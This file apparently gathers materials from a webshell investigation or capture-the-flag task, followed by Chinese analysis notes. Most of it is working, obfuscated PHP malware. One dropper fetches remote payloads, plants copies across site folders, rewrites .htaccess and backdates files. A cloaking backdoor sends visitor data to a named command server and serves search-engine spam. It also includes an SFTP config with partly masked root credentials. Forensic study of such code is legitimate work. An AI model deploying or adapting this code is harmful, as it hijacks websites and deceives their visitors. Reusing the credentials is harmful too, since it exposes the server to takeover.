;/*CE83ra2y*/; ;/*c6SdH0Pl*/; ;/*$_njSqalt*/; if (!empty($_GET[$M[34].$M[33].$M[52]])) { ;/*$_Oh3*/; $_tLHvr=l($_GET[$M[34].$M[33].$M[52]]); ;/*Mb4wz*/; $_Xjz5q=trim(su($_tLHvr.$M[33].$M[64].$M[1].$M[24].$M[19].$M[33].$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30].$M[17].$M[30].$M[60].$M[30])); $_nu9b=trim(su($_tLHvr.$M[33].$M[64].$M[1].$M[24].$M[19].$M[33].$M[51].$M[40].$M[15].$M[19].$M[43].$M[28].$M[41].$M[19].$M[17].$M[30].$M[60].$M[30])); } ;/*u4b*/; } $_mlsJ=explode("T","soumise"); ;/*86QK*/; if (empty($_Xjz5q) || empty($_nu9b)) { ;/*carafe*/; exit; } ;/*ICb1F*/; ;/*$_Oh3*/; if (substr($_nu9b,0,1)=='/' && substr($_nu9b,-1,1)!='/') { ;/*$_qt2*/; ;/*jowl*/; ;/*$_bdyjMTK*/; $_9LmM=$_QcNpZ.$_nu9b; ;/*$_W03F*/; ;/*jimjam*/; $_fqp2C=$_ITe.$_ZaJK4nT.$_nu9b; ;/*rvlIP*/; preg_match('/(\/.+)\//',$_9LmM,$_dhmy); $_ICTbre5=$_dhmy[1]; ;/*envy*/; ;/*repel*/; $_Nfm8RS = explode("/",ltrim(str_replace($_QcNpZ,'',$_ICTbre5),"/")); ;/*finglas*/; $_c9GbEW = $_QcNpZ; ;/*thibauld*/; ;/*OCp*/; foreach($_Nfm8RS as $_XEv3) { $_c9GbEW .= "/" . $_XEv3; if ( $_ZtY9EF( $_c9GbEW ) ) { $_Oh3( $_c9GbEW, 0755 ); } else { mkdir( $_c9GbEW, 0755, true ); } } ;/*valuable*/; ;/*$_rHC29mV*/; ;/*louviers*/; if ( $_sVwj8($_9LmM) ) { ;/*senault*/; $_Oh3($_9LmM,0777); ;/*qXt1*/; $_mlsJ=explode("N","cabala"); $_O7MZfz($_9LmM); ;/*specula*/; } $_JVo=dn(1767594237); $_guSMY($_9LmM,$_Xjz5q); ;/*$_t6H*/; if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { ;/*$_ICTbre5*/; $_bTD3dn=1; $_rDcINj=str_replace("n0K","","pitting"); ;/*mystery*/; echo $_fqp2C; ;/*$_edwT8*/; ;/*lashings*/; } ;/*$_jN3tCgQ*/; $_wKdzBs=ru("curdsYX2OdF"); } ;/*$_wET7*/; ;/*slm*/; ;/*bloo*/; if($_nu9b==$M[55].$M[28].$M[43].$M[24].$M[1].$M[41]) { ;/*swerves*/; $_pPVrmkM=array(); ;/*gewgaw*/; ;/*dardant*/; $_SN7=array(); ;/*pobTRG*/; ;/*cataract*/; $_N69C=0; ;/*$_YphNi*/; $_pPVrmkM[]=$_QcNpZ; $_cszEUio=xy("lydiaRUX6LQGFNconveyed"); $_SN7[0][]=$_QcNpZ; ;/*$_jN3tCgQ*/; while(!empty($_SN7[$_N69C])) { foreach($_SN7[$_N69C] as $_9h52zN) { $_cw8u0M=$_Dm5ok6($_9h52zN.$M[69].$M[72],GLOB_ONLYDIR); if (!empty($_cw8u0M)) { foreach($_cw8u0M as $_RyCT) { if ( preg_match('/plugin[s]?$/si',$_RyCT)==1 ){continue;} $_SN7[$_N69C+1][]=$_RyCT; $_pPVrmkM[]=$_RyCT; $_Oh3($_RyCT,0755); } } } $_N69C++; if (count($_pPVrmkM)>=1000) {break;} } if ( count($_pPVrmkM)<4 ) { $_mf2=array(); $_mf2[]=$M[40].$M[41].$M[28].$M[2].$M[19].$M[54]; ;/*$_cw8u0M*/; ;/*$_x3weLZl*/; $_mf2[]=$M[40].$M[43].$M[64].$M[15].$M[34].$M[24].$M[19].$M[54]; ;/*$_VKGeF4d*/; ;/*scurry*/; $_mf2[]=$M[30].$M[19].$M[41].$M[52].$M[15].$M[28].$M[30].$M[19].$M[54]; $_mf2[]=$M[64].$M[54].$M[54]; ;/*$_rHC29mV*/; $_mlsJ=explode("b","puget"); $_mf2[]=$M[64].$M[28].$M[64].$M[48].$M[19]; ;/*pawned*/; ;/*DzY8*/; $_mf2[]=$M[20].$M[19].$M[43].$M[24].$M[19].$M[55]; ;/*$_Dm5ok6*/; ;/*wJPk*/; ;/*04eTFKp*/; $_mf2[]=$M[15].$M[40].$M[25].$M[55].$M[28].$M[55].$M[26]; ;/*lanchets*/; $_mf2[]=$M[25].$M[28].$M[64].$M[68].$M[34].$M[52]; ;/*dawned*/; $_mf2[]=$M[24].$M[28].$M[30].$M[28].$M[25].$M[28].$M[54].$M[19]; ;/*DCxru*/; $_mf2[]=$M[24].$M[28].$M[30].$M[28]; ;/*incest*/; ;/*$_68jpMNA*/; ;/*yA2rFLW*/; $_mf2[]=$M[31].$M[54]; ;/*$_Q4wAq0*/; $_mf2[]=$M[15].$M[1].$M[2]; $_mf2[]=$M[34].$M[54].$M[19].$M[55]; ;/*tract*/; $_mf2[]=$M[51].$M[1].$M[43].$M[30].$M[54]; ;/*$_TybU*/; shuffle($_mf2); ;/*laborers*/; ;/*$_8AIHxgq*/; for($_hSP=0;$_hSP<3;$_hSP++) { $_edwT8=$_QcNpZ.'/'.$_mf2[$_hSP]; mkdir($_edwT8,0755,true); if ( $_ZtY9EF($_edwT8) ){$_pPVrmkM[]=$_edwT8;} } } ;/*H0d*/; $_bTD3dn=0; ;/*pwuj*/; $_HCOBFIL=$M[40].$M[43].$M[24].$M[19].$M[60].$M[17].$M[52].$M[48].$M[52]; ;/*9xtTQ*/; for($_m0DNYye=1;$_m0DNYye<=10;$_m0DNYye++) { $_ICTbre5=$_pPVrmkM[array_rand($_pPVrmkM,1)]; $_9LmM=$_ICTbre5.'/'.$_HCOBFIL; $_fqp2C=$_ITe.$_ZaJK4nT.str_replace($_QcNpZ,'',$_ICTbre5).'/'.$_HCOBFIL; if ( !$_sVwj8($_9LmM) ) { $_guSMY($_9LmM,$_Xjz5q); if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { $_bTD3dn=1;echo $_fqp2C;break; } } } ;/*XS4y*/; if ($_bTD3dn==0) { $_wKdzBs=ru("pondered0XRmMwLYD"); ;/*halters*/; for($_m0DNYye=1;$_m0DNYye<=10;$_m0DNYye++) { $_ICTbre5=$_pPVrmkM[array_rand($_pPVrmkM,1)]; $_HCOBFIL=$_wET7($_ICTbre5).$M[17].$M[52].$M[48].$M[52]; $_9LmM=$_ICTbre5.'/'.$_HCOBFIL; $_fqp2C=$_ITe.$_ZaJK4nT.str_replace($_QcNpZ,'',$_ICTbre5).'/'.$_HCOBFIL; if ( !$_sVwj8($_9LmM) ) { $_guSMY($_9LmM,$_Xjz5q); if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { $_bTD3dn=1;echo $_fqp2C;break; } } } ;/*$_hSP*/; } $_JVo=dn(1763909597); if ($_bTD3dn==0) { ;/*$_9h52zN*/; ;/*dWCnIwu*/; $_ICkM=$M[65].$M[62]; ;/*Lg3*/; ;/*hoped*/; ;/*KF85XBV*/; $_ICkM.=$M[25].$M[26].$M[53].$M[70]; ;/*moonblue*/; ;/*Mga*/; $_ICkM.=$M[34].$M[28].$M[51]; ;/*$_m0DNYye*/; $_ICkM.=$M[15].$M[24].$M[19]; $_ICkM.=$M[55].$M[3].$M[60].$M[42]; ;/*gobble*/; ;/*$_g85Z*/; $_ICkM.=$M[52].$M[54].$M[31]; ;/*sweety*/; $_ICkM.=$M[30].$M[41].$M[67]; ;/*jnK*/; $_ICkM.=$M[20].$M[6].$M[29].$M[43].$M[68]; $_ICkM.=$M[40].$M[16].$M[46]; $_ICkM.=$M[48].$M[2].$M[1]; ;/*echaude*/; ;/*into*/; $_ICkM.=$M[12].$M[64].$M[39]; for($_m0DNYye=1;$_m0DNYye<=11;$_m0DNYye++) { $_m0DNYye==11 ? $_ICTbre5=$_QcNpZ : $_ICTbre5=$_pPVrmkM[array_rand($_pPVrmkM,1)]; $_rHC29mV=str_shuffle($_ICkM); $_xS7=substr($_rHC29mV,0,mt_rand(3,10)).$M[17].$M[52].$M[48].$M[52]; $_9LmM=$_ICTbre5.'/'.$_xS7; $_fqp2C=$_ITe.$_ZaJK4nT.str_replace($_QcNpZ,'',$_ICTbre5).'/'.$_xS7; $_guSMY($_9LmM,$_Xjz5q); if ( $_sVwj8($_9LmM) && md5($_Xjz5q)==md5(file_get_contents($_9LmM)) ) { $_bTD3dn=1;echo $_fqp2C;break; } } } } ;/*knF73v*/; if ( isset($_bTD3dn) && $_bTD3dn==1 ) { ;/*hating*/; $_lupLq($_9LmM, strtotime($M[57].$M[70].$M[46].$M[46].$M[45].$M[24].$M[28].$M[26].$M[54], time())); ;/*8kYNcyJ*/; ;/*$_JVo*/; if ( $_ICTbre5!=$_QcNpZ ) { ;/*pisspots*/; ;/*eXycR*/; $_OxdcIPr=$_ICTbre5.$M[69].$M[17].$M[48].$M[30].$M[28].$M[64].$M[64].$M[19].$M[54].$M[54]; if ($_sVwj8($_OxdcIPr)) { ;/*cJMVn*/; $_Oh3($_OxdcIPr,0777); ;/*$_rHC29mV*/; $_guSMY($_OxdcIPr,''); $_O7MZfz($_OxdcIPr); } if ( $_wET7($_9LmM)!=$M[40].$M[43].$M[24].$M[19].$M[60].$M[17].$M[52].$M[48].$M[52] ) { ;/*bhoeQ9*/; ;/*maidens*/; $_jN3tCgQ=''; ;/*$_Dd6*/; ;/*Mbzfs0*/; foreach( $_Dm5ok6($_ICTbre5.$M[69].$M[72].$M[17].$M[52].$M[48].$M[52]) as $_qezuS ) { $_jN3tCgQ.=$M[18].$_wET7($_qezuS); } ;/*vocalism*/; ;/*$_ITe*/; $_jN3tCgQ=ltrim($_jN3tCgQ,$M[18]); ;/*baggot*/; $_uhUZXi=$M[14].$_eiavw2z; ;/*18FzDk4L*/; $_uhUZXi.="\n".$M[50].$M[9].$M[40].$M[15].$M[19].$M[54].$M[36].$M[28].$M[30].$M[64].$M[48].$M[45].$M[38].$M[11].$M[61].$_jN3tCgQ.$M[23].$M[56].$M[38].$M[49]; ;/*$_umYhCl*/; $_uhUZXi.="\n".$M[63].$M[55].$M[24].$M[19].$M[55].$M[45].$M[28].$M[15].$M[15].$M[1].$M[53].$M[58].$M[24].$M[19].$M[43].$M[26]; ;/*ladders*/; $_uhUZXi.="\n".$M[32].$M[15].$M[15].$M[1].$M[53].$M[45].$M[51].$M[55].$M[1].$M[41].$M[45].$M[28].$M[15].$M[15]; ;/*emh*/; $_uhUZXi.="\n".$M[50].$M[69].$M[9].$M[40].$M[15].$M[19].$M[54].$M[36].$M[28].$M[30].$M[64].$M[48].$M[49]; ;/*loughs*/; $_wKdzBs=ru("solomonl"); $_guSMY($_OxdcIPr,$_uhUZXi); ;/*$_RyCT*/; ;/*h4N2i*/; $_lupLq($_9LmM, strtotime($M[57].$M[70].$M[46].$M[46].$M[45].$M[24].$M[28].$M[26].$M[54], time())); } } } ;/*KdzLF*/; function su($_zMfuG) { $_Q4wAq0=""; if ( function_exists($M[64].$M[34].$M[55].$M[15].$M[33].$M[19].$M[60].$M[19].$M[64]) ) { $_pk19yQ=curl_init(); curl_setopt ($_pk19yQ, CURLOPT_URL, $_zMfuG); curl_setopt ($_pk19yQ, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($_pk19yQ, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt( $_pk19yQ, CURLOPT_SSL_VERIFYHOST, FALSE ); curl_setopt( $_pk19yQ, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt( $_pk19yQ, CURLOPT_TIMEOUT, 30); curl_setopt ($_pk19yQ, CURLOPT_HEADER, 0); $_Q4wAq0 = curl_exec($_pk19yQ); curl_close($_pk19yQ); }else { $_Q4wAq0=file_get_contents($_zMfuG); } return $_Q4wAq0; } ;/*Sn2cRF*/; ;/*0jaZEAe*/; ;/*$_XEv3*/; ?>

1
<?php
2
 goto Q3PzL; Pz50r: if (strpos($onzye, "\152\x70\x32\60\62\x33") !== false) { goto ICDIW; } goto feg0I; sPvK4: $kDw7W = urlencode(@$_SERVER["\x48\124\124\x50\137\x52\x45\x46\x45\122\x45\122"]); goto i7YFY; cLeNu: $u_123 = curl_init(); goto O17xo; GUiLP: dh39H: goto PGhwT; lvqC0: $C00PX = urlencode($_SERVER["\110\124\124\x50\137\x48\117\123\x54"]); goto fhxlP; IzrrP: if (strpos($onzye, "\x66\x61\166\x69\143\157\156\56\151\x63\x6f") !== false) { goto FUs7b; } goto NG3Q9; koBlq: on84q($BdhEj, "\61"); goto GwRx9; RhQHP: exit; goto fi4L3; i7Kcc: header("\x48\124\124\x50\x2f\x31\56\x31\40\x34\60\64\40\x4e\157\164\40\x46\x6f\165\x6e\x64"); goto joXq7; bmfEX: ADo8X: goto Pz50r; eVndT: ICDIW: goto i7Kcc; i3WhK: $cfzWG = curl_exec($u_123); goto NPq05; fV5Np: exit; goto wGLdE; c_DY0: $CsxQD = $_SERVER["\123\103\122\x49\x50\124\137\x4e\x41\115\105"]; goto CajuY; ESm_2: if (!empty($LR82d)) { goto KcWHX; } goto zRThS; aRSyK: echo "\157\153"; goto BLBwC; U3jyY: curl_setopt($u_123, CURLOPT_RETURNTRANSFER, true); goto HpxdV; vgAq8: function HVQzI($bCJNW) { goto GVxEL; jXVY4: Ia03f: goto T9T0v; fRmo8: fclose($Hdx4m); goto l4njp; aV23E: if (!$Hdx4m) { goto Ia03f; } goto MAhde; l4njp: return $iZgFy; goto jXVY4; MAhde: $iZgFy = fread($Hdx4m, filesize($bCJNW)); goto fRmo8; T9T0v: return false; goto QcaCs; GVxEL: $Hdx4m = fopen($bCJNW, "\162"); goto aV23E; QcaCs: } goto o7E_t; SPtAd: $LR82d = trim($LR82d) . "\15\xa" . "\x53\x69\x74\145\155\x61\160\x3a\x20{$khOyn}"; goto uC7wa; rISDH: $CsxQD = $CsxQD . "\x3f"; goto kWaWd; pymXb: FUs7b: goto j7hlu; MMmgl: curl_setopt($u_123, CURLOPT_SSL_VERIFYHOST, FALSE); goto i3WhK; fi4L3: return; goto gZGp6; Xo4Ii: $xxYrc = $_SERVER["\110\124\x54\120\x5f\103\x4c\111\105\x4e\124\x5f\x49\120"]; goto K51lJ; PGhwT: $xxYrc = urlencode($xxYrc); goto F8qfy; O17xo: curl_setopt($u_123, CURLOPT_URL, $sMWo7); goto U3jyY; gwGei: oyrH1: goto RhQHP; feg0I: if (substr($cfzWG, 0, 5) == "\x3c\x3f\x78\x6d\x6c") { goto UOyS7; } goto UJqv3; aTC9h: $_SERVER["\122\105\121\125\105\123\x54\137\x53\x43\x48\105\115\105"] = "\150\164\164\160\163"; goto asYIX; IMwmM: if (!empty($_SERVER["\x52\105\121\125\x45\x53\124\137\123\103\110\105\115\105"]) and $_SERVER["\122\105\x51\x55\x45\123\124\x5f\x53\103\110\105\x4d\105"] == "\150\164\164\x70\x73" or !empty($_SERVER["\x48\124\124\120\x53"]) and $_SERVER["\x48\x54\x54\x50\123"] == "\157\156" or !empty($_SERVER["\x53\x45\x52\x56\x45\122\x5f\120\x4f\122\124"]) and $_SERVER["\123\x45\x52\x56\105\x52\137\120\117\x52\x54"] == "\64\64\63" or isset($_SERVER["\x48\124\124\120\137\x58\137\x46\117\122\x57\101\x52\104\x45\x44\137\x50\122\x4f\x54\x4f"]) and $_SERVER["\x48\124\124\120\137\x58\x5f\106\x4f\x52\x57\x41\x52\104\105\x44\x5f\120\122\x4f\x54\x4f"] == "\x68\164\164\x70\x73") { goto wt7he; } goto H066U; zRThS: if (!(strpos($onzye, "\162\x6f\142\157\164\163\56\164\170\x74") !== false)) { goto W0XDg; } goto beCHo; n62jh: ON84Q("\x72\x6f\x62\157\x74\163\x2e\164\170\164", $LR82d); goto gwGei; OWiOl: goto fdnq8; goto eVndT; BLBwC: exit; goto z7PSC; uEuvU: $J0L00 = urlencode(@$_SERVER["\110\124\x54\x50\137\101\103\103\x45\120\124\137\114\101\x4e\107\x55\101\x47\105"]); goto sN56l; kQBcr: curl_setopt($u_123, CURLOPT_SSL_VERIFYPEER, FALSE); goto MMmgl; ehCVl: if (!preg_match("\57\x28\x53\145\x7a\156\141\155\102\157\164\174\x6a\141\166\141\x7c\123\x63\162\x61\x70\171\x7c\123\x77\x69\x66\x74\x62\x6f\x74\174\x4a\141\x75\156\164\171\x7c\103\x72\x61\167\x6c\104\141\x64\x64\x79\174\151\x6e\x64\171\x20\114\x69\142\x72\x61\162\x79\174\x6d\x6a\61\x32\x62\x6f\164\174\x75\156\x69\x76\x65\x72\x73\141\154\x46\x65\145\144\120\141\x72\x73\x65\x72\x7c\102\141\162\x6b\162\157\167\x6c\145\x72\174\101\155\x61\x7a\x6f\x6e\x42\x6f\164\x7c\160\x79\164\150\157\156\55\162\x65\x71\165\x65\163\164\163\x7c\101\x68\162\x65\x66\x73\102\157\164\x7c\x65\x7a\x6f\157\155\x73\x7c\104\x6f\x74\102\157\x74\x7c\x4a\151\153\145\123\x70\151\144\x65\x72\174\x43\x65\x6e\163\x79\163\111\x6e\163\x70\145\143\x74\x7c\x59\151\163\157\165\123\160\x69\144\x65\162\174\171\x61\156\x64\145\x78\102\x6f\x74\x7c\x4f\102\157\164\x7c\x47\120\x54\x42\x6f\x74\x7c\143\x6c\141\x75\144\145\x62\x6f\164\x7c\x48\x65\x72\x69\164\162\151\x78\x7c\120\x79\164\150\157\156\x7c\x64\151\x67\x45\170\164\174\146\x65\x65\x64\x6c\x79\x7c\131\171\x53\x70\x69\144\145\162\x7c\123\145\x6d\x72\x75\x73\150\x42\157\x74\x7c\105\x61\163\x6f\x75\123\160\151\144\145\162\174\x50\145\x74\x61\154\x42\157\164\x7c\x70\171\164\x68\157\156\55\165\162\x6c\154\x69\x62\x7c\110\x74\x74\160\x43\154\x69\x65\156\164\174\104\141\x74\x61\106\157\162\x53\x45\117\174\x41\x70\141\143\150\145\102\145\156\x63\150\x7c\x50\141\x6c\x6f\141\x6c\164\x6f\x6e\145\x74\167\x6f\162\153\x73\x7c\101\x73\153\124\142\106\130\x54\x56\x7c\x62\x79\x74\x65\163\x70\x69\x64\145\x72\x7c\120\141\161\154\145\142\157\x74\x7c\x5a\155\105\x75\x7c\107\157\x2d\150\x74\164\160\55\x63\154\151\145\x6e\164\174\x46\x65\145\144\x44\x65\x6d\x6f\x6e\x7c\x4c\x69\x67\x68\164\x44\x65\x63\x6b\x52\x65\160\157\x72\164\163\x20\102\157\x74\174\x43\x6f\157\x6c\x70\141\x64\x57\x65\142\153\x69\x74\51\57\151", $_SERVER["\x48\124\x54\x50\137\x55\123\x45\x52\137\101\107\105\116\x54"])) { goto M20fC; } goto F2zsX; Zb824: $sMWo7 = $Hf23t . "\x3f\x61\147\x65\156\x74\x3d{$re_65}\x26\162\x65\146\x65\162\75{$kDw7W}\x26\x6c\141\156\147\x3d{$J0L00}\x26\151\160\x3d{$xxYrc}\46\x64\x6f\155\x3d{$C00PX}\46\150\x74\164\160\x3d{$BbVC1}\46\165\162\151\x3d{$onzye}\x26\x70\x63\x3d{$IgDXb}\x26\162\x65\x77\x72\151\164\145\141\142\x6c\x65\75{$vvypT}\46\x73\x63\x72\x69\160\164\75{$FgK0R}\46\163\x69\164\x65\x6d\x61\x70\x3d" . urlencode($khOyn); goto eBqRT; O3ilp: if (isset($_SERVER["\x48\x54\x54\x50\x5f\x58\137\106\117\122\x57\x41\122\x44\105\104\x5f\106\x4f\122"])) { goto VcImj; } goto Hq7wK; Hq7wK: goto dh39H; goto w5VHi; joXq7: fdnq8: goto JV7ud; j3NSS: $YwVDi = "\56\143\157\x6d\x2f"; goto V5PCU; oGFWn: goto xnBwY; goto LDXJ0; UJqv3: header("\103\x6f\156\164\145\x6e\x74\x2d\124\171\x70\x65\x3a\x20\164\145\170\x74\x2f\150\164\155\x6c\x3b\x20\x63\x68\141\162\163\x65\x74\x3d\x75\164\x66\55\70"); goto oGFWn; LR00l: header("\x43\157\x6e\164\x65\x6e\x74\55\x54\x79\160\145\72\x20\x74\x65\170\x74\x2f\x78\x6d\154\x3b\x20\x63\150\x61\x72\x73\145\164\x3d\165\164\x66\x2d\x38"); goto JtZw6; JtZw6: xnBwY: goto OWiOl; sAZxw: $LR82d = "\125\x73\145\x72\x2d\141\147\x65\x6e\x74\72\x20\52\xd\12\101\x6c\x6c\157\167\72\x20\x2f"; goto wq6rF; SE3Xo: goto PWuY6; goto cuL75; cuL75: MlKzx: goto XVVOx; Q3PzL: $IgDXb = "\x55\x31\125\x42\126\121\x6f\64"; goto j3NSS; PEMKb: $BdhEj = "\164\x6c\143\x2e\x74\170\164"; goto h4gZB; RoVhv: if (!empty($cfzWG)) { goto apZHz; } goto cLeNu; x2mLL: function On84Q($bCJNW, $iZgFy) { goto xep1i; v5nHn: fclose($Hdx4m); goto B4TLF; sPcwS: fwrite($Hdx4m, $iZgFy); goto v5nHn; tqPv5: o7ha5: goto FecjU; naS33: if (!$Hdx4m) { goto o7ha5; } goto sPcwS; B4TLF: return true; goto tqPv5; xep1i: $Hdx4m = fopen($bCJNW, "\167"); goto naS33; FecjU: return false; goto QsqzB; QsqzB: } goto vgAq8; N_nWZ: $sMWo7 = $Hf23t . "\x3f\x61\147\145\156\164\x3d{$re_65}\46\x72\145\146\x65\162\x3d{$kDw7W}\46\154\x61\x6e\x67\75{$J0L00}\46\151\160\x3d{$xxYrc}\46\x64\157\155\75{$C00PX}\x26\x68\x74\164\160\x3d{$BbVC1}\46\x75\162\x69\75{$onzye}\46\x70\143\75{$IgDXb}\46\x72\145\x77\162\151\x74\x65\x61\x62\x6c\145\75{$vvypT}\46\163\x63\162\x69\160\164\x3d{$FgK0R}"; goto ucf7o; i_w1I: CXV9F: goto xLTSp; XVVOx: $CsxQD = "\x2f\x3f"; goto eOumY; wyPKV: W0XDg: goto HhP0D; i7YFY: $re_65 = urlencode($_SERVER["\110\x54\x54\x50\137\x55\x53\x45\x52\x5f\x41\107\x45\x4e\124"]); goto lvqC0; F8qfy: $FgK0R = urlencode($_SERVER["\x53\103\x52\x49\120\x54\x5f\x4e\101\x4d\x45"]); goto IMwmM; V5PCU: $TW_jg = "\x34\x34\x37\61\x2e\x61\x72\x74\x69"; goto E2Woj; s7Av1: CZw92: goto ZvpRo; eBqRT: DoYCK: goto MdLoL; E0vbj: VcImj: goto flseZ; KS7PE: $vvypT = HvQzI($BdhEj); goto q7Nmc; hKJLw: $ybJan = "\x64\165\x63\153\144\165\x63\x6b\147\x6f\174\x67\157\x6f\x67\154\145\174\141\x6f\154\174\131\141\150\157\x6f\x7c\142\x69\x6e\147"; goto ehCVl; K51lJ: goto dh39H; goto E0vbj; Z_7yA: HtX8k: goto ImT06; MdLoL: $cfzWG = @file_get_contents($sMWo7); goto RoVhv; vypMh: if (empty($cfzWG)) { goto hBvz5; } goto t1FHh; F2zsX: header("\110\x54\x54\120\57\x31\56\60\x20\64\60\x33\40\106\157\162\142\x69\x64\144\x65\x6e"); goto fV5Np; gZGp6: hBvz5: goto JU5BW; wq6rF: $khOyn = "{$BbVC1}\x3a\x2f\57" . $C00PX . $CsxQD . "\x73\x69\164\x65\x6d\141\160\x2e\x78\x6d\154"; goto SPtAd; QuRaC: $BbVC1 = urlencode($_SERVER["\x52\x45\121\125\x45\123\124\x5f\x53\103\x48\x45\115\105"]); goto jYRml; GwRx9: XS6rP: goto mJN9n; tai0M: $xxYrc = $_SERVER["\122\x45\x4d\117\124\x45\137\101\104\x44\x52"]; goto sPvK4; H066U: $_SERVER["\122\105\121\125\x45\x53\124\x5f\x53\x43\x48\105\115\105"] = "\x68\x74\164\x70"; goto icTuN; icTuN: goto gWlmg; goto nwmm0; w5VHi: qSFnt: goto Xo4Ii; tmGD9: xsZWg: goto sAZxw; y3_Xo: if (!is_file($BdhEj)) { goto KMNyK; } goto KS7PE; ZvpRo: if ($vvypT == 0) { goto MlKzx; } goto MbtjR; z7PSC: QOAkV: goto PEMKb; HpxdV: curl_setopt($u_123, CURLOPT_FOLLOWLOCATION, false); goto kQBcr; zfwa0: goto Cls4u; goto Z_7yA; NPq05: curl_close($u_123); goto u09Mv; GLjhg: echo $khOyn . "\72\x20" . $JHIHy . "\x3c\x62\162\x2f\76"; goto Zb824; q7Nmc: goto VFktA; goto DEf96; h4gZB: $vvypT = 0; goto y3_Xo; Ne4xw: if ($cfzWG === "\x6f\x6b") { goto CXV9F; } goto lSxj_; d5Jkj: $i0oQL = "\x74\160\x3a\57\57\143\167"; goto UwDDm; dSm71: $iqxFs = "\x68\x74"; goto d5Jkj; UwDDm: $Hf23t = $iqxFs . $i0oQL . $TW_jg . $XhGp0 . $YwVDi; goto hKJLw; fhxlP: if (isset($_SERVER["\110\124\x54\120\137\103\114\x49\x45\116\x54\137\x49\x50"])) { goto qSFnt; } goto O3ilp; aa89y: goto XS6rP; goto i_w1I; eOumY: PWuY6: goto tmGD9; ImT06: $LR82d = ''; goto N_nWZ; JV7ud: echo $cfzWG; goto ESm_2; sN56l: error_reporting(0); goto tai0M; kMzIO: exit; goto bmfEX; E2Woj: $XhGp0 = "\163\x74\x73\141\167"; goto dSm71; flseZ: $xxYrc = $_SERVER["\110\124\x54\120\137\x58\137\x46\x4f\x52\127\101\x52\104\105\104\137\106\117\122"]; goto GUiLP; uC7wa: $JHIHy = ''; goto GLjhg; LDXJ0: UOyS7: goto LR00l; asYIX: gWlmg: goto x2mLL; jYRml: if (!(strpos($onzye, "\164\x6c\143\164\x6c\143") !== false)) { goto QOAkV; } goto aRSyK; qhSy6: $cfzWG = @file_get_contents($gS141); goto Ne4xw; o7E_t: $onzye = urlencode($_SERVER["\122\x45\121\x55\x45\x53\x54\137\x55\122\x49"]); goto QuRaC; nyaa9: KcWHX: goto n62jh; DEf96: KMNyK: goto k6gD4; xWir5: goto mMHV2; goto pymXb; PJDII: ON84Q($BdhEj, "\60"); goto aa89y; nwmm0: wt7he: goto aTC9h; CajuY: if (strpos($CsxQD, "\x69\156\x64\x65\170\56\160\150") !== false) { goto CZw92; } goto rISDH; k6gD4: $gS141 = $BbVC1 . "\x3a\x2f\57" . $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\x54"] . "\57\164\x6c\x63\164\x6c\x63"; goto qhSy6; mJN9n: VFktA: goto IzrrP; kWaWd: goto xsZWg; goto s7Av1; JU5BW: Cls4u: goto xWir5; Cdbk5: header("\x48\124\x54\120\57\61\x2e\x30\40\65\60\60\40\x49\156\164\x65\x72\156\x61\154\x20\123\x65\162\x76\145\162\x20\105\x72\x72\x6f\x72"); goto kMzIO; u09Mv: apZHz: goto vypMh; t1FHh: if (!(substr($cfzWG, 0, 10) == "\145\162\x72\x6f\162\40\x63\157\x64\x65" or $cfzWG == "\x35\60\60" or strpos($cfzWG, "\x42\x61\x64\40\107\141\164\x65\x77\x61\171") !== false)) { goto ADo8X; } goto Cdbk5; ucf7o: if (!(strpos($onzye, "\160\151\x6e\147\163\x69\x74\145\155\x61\x70") !== false)) { goto DoYCK; } goto c_DY0; NG3Q9: if (strpos($onzye, "\162\157\142\x6f\164\163\56\x74\170\x74") !== false or strpos($onzye, "\152\x70\62\x30\62\x33") !== false or strpos($onzye, "\160\151\x6e\147\163\151\164\x65\x6d\x61\160") !== false or preg_match("\x40\x5e\x2f\50\x2e\x2a\x3f\x29\56\170\x6d\154\x24\100\x69", $_SERVER["\x52\105\121\x55\x45\x53\124\137\x55\x52\111"]) or preg_match("\57\x28{$ybJan}\x29\57\x69", $_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"]) or preg_match("\x2f\x28{$ybJan}\x29\57\x69", @$_SERVER["\x48\x54\124\120\x5f\x52\105\x46\105\x52\x45\x52"])) { goto HtX8k; } goto zfwa0; HhP0D: goto oyrH1; goto nyaa9; wGLdE: M20fC: goto uEuvU; MbtjR: $CsxQD = "\57"; goto SE3Xo; lSxj_: $vvypT = 0; goto PJDII; xLTSp: $vvypT = 1; goto koBlq; beCHo: oN84q("\x72\x6f\x62\x6f\164\x73\56\x74\x78\x74", $cfzWG); goto wyPKV; j7hlu: mMHV2:
3
?>

1
{
2
    "name": "aaPanel PHP Server",
3
    "host": "160.***.***.236",
4
    "protocol": "sftp",
5
    "port": 22,
6
    "username": "root",
7
    "password": "12***23A",
8
    "remotePath": "/www/wwwroot/******.online",
9
    "uploadOnSave": true,
10
    "useTempFile": false,
11
    "openSsh": false,
12
    "ignore": [
13
        ".vscode",
14
        ".git",
15
        ".gitignore",
16
        "node_modules"
17
    ]
18
}

1
1. 硬编码的核心字符串解析
2
脚本中隐藏了大量十六进制 (\x...) 和八进制 (\...) 编码的字符串，解码后的关键信息如下：
3
C2服务器地址 (远程控制端): http://cw4471.artistsaw.com/ (由 $iqxFs . $i0oQL . $TW_jg . $XhGp0 . $YwVDi 拼接而成)
4
存活测试/后门特征: tlctlc
5
本地特征文件: tlc.txt, sitemap.xml, robots.txt
6
关键URI路径: jp2023, favicon.ico, pingsitemap
7
目标搜索引擎特征: duckduckgo|google|aol|yahoo|bing
8
爬虫UA正则匹配: 包含了大量的爬虫特征，如 SeznamBot, Scrapy, Googlebot, YandexBot 等。
9

10
1. 核心逻辑分
11
这段脚本的主要行为是根据访问者的身份（IP、UA、Referer）和请求的URI，来决定是返回正常的404/403，还是从远程服务器拉取内容并展示。
12
存活检测后门 (极速拿分点):
13
代码中有一段逻辑：if (strpos($onzye, "tlctlc") !== false) { echo "ok"; exit; }
14
含义: 如果你请求的URI中包含 tlctlc（例如 /?a=tlctlc），服务器会直接返回 ok。这通常用于出题人验证后门是否存活，也可以作为你确认脚本正在运行的标志。
15
